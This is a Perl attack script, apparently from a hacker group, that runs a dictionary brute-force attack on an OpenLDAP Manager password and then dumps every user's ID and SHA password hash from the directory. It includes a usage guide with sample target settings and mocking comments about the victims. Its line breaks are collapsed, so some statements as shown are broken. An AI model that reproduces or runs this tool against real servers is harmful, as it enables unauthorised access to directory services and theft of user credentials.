#!/usr/bin/perl # LDAP_Brute.pl # lets do something fun like brute force a LDAP Manager password # and then Dump all user and passwords from the Database. # Sound Good ? Ok lets do it. # by: Victim1 # shouts to all AngryPacketeers !! # http://angreypacket.com # recommendation: start the $arg u (user) with something like asmi* for as in Ann Smith or something, b e creative they are only users hahaha. # Extra Info: This was written and tested on Slackware 8.0 against OpenLDAP. # this sorta slow but gets the job done. system("clear"); print "Starting Crack:\n"; print "---------------\n"; use Getopt::Std; getopts("t:d:b:u:l:?", \%args); # continue with normal crack if($args{t}) { $target = $args{t}; } else { Usage(); } if($args{d}) { $dn = $args{d} } else { Usage(); } if($args{b}) { $base = $args{b} } else { Usage(); } if($args{u}) { $user = $args{u}; } else { Usage(); } if($args{l}) { $dictionary = $args{l}; } else { Usage(); } if($args{"?"}) { Usage(); } # start brutality(); ldap_connect(@passwords); # Start Brute Force of LDAP Manager Password. # should return this: --> # As this is what we will be expecting for a return... # jsmith:{SHA}JheluJmppdiUiMJhn9X1raH26fA=:0:0:/jsmith: sub ldap_connect { foreach $password (@passwords) { use Net::LDAP; $ldap = Net::LDAP->new($target); $ldap->bind ($dn, password => $password ); $ldap->unbind; print "Manager -> Guess: $password\n"; get_accounts($target, $password); } } # OPEN Dictionary and Brute force LDAP server. sub brutality { #lets load up dictionary open(DICT, "<$args{l}") or die "Cannot open: $args{l} $@\n"; @passwords = ; close(DICT); chomp @passwords; } sub get_accounts { # lets swipe user accounts and SHA_Base64 Keys. use Net::LDAP; $ldapc = Net::LDAP->new($target) or die "$@"; $ldapc->bind($dn, password => $password) || die "$@"; $mesg = $ldapc->search ( base => $base, scope => "subtree", filter => "(uid=$user)" ); $mesg->code && die $mesg->error; # this is a fucking pain in the ass to break a fucking loop ?? isnt it... $i=0; foreach $entry ($mesg->all_entries) { @uid=$entry->get_value('uid'); @pass=$entry->get_value('userpassword'); $test = ($uid[0].":".$pass[0].":".$i.":".$i.":/".$uid[0].":"); if ($test =~ /$uid[0]:{SHA}/) { print "CRACKED MANAGER PASSWORD !!!! -> $password\n"; print "$test\n"; sleep 2; print "Dumping Database please Wate\n"; dump_database(); exit; } else { $ldapc->unbind; return 0; } } } sub dump_database { $ldap = Net::LDAP->new($target) or die "$@"; $ldap->bind($dn, password => $password) || die "$@"; $mesg = $ldap->search ( base => $base, scope => "subtree", filter => "(uid=*)" ); $mesg->code && die $mesg->error; $i=0; foreach $entry ($mesg->all_entries) { @uid=$entry->get_value('uid'); @pass=$entry->get_value('userpassword'); print $uid[0].":".$pass[0].":". $i.":".$i.":/".$uid[0].":\n"; } $ldap->unbind; } # APP USAGE -----> ################## sub Usage { print < cn=Manager,o=organization,c=country ( US ) -b base dn (o=Microsoft,c=US) -u User -l Password List ( Dictionary ) -? This Menu Sample: perl LDAP_Brute.pl -t 192.168.20.10 -d cn=Manager,o=MicroSoft,c=US -b o=Microsoft,c=US -u jsmi* -d /usr/local/lib/Cracklib Note: You are on you own if you do something Naughty little wee wee's ~! USAGE exit; } ##################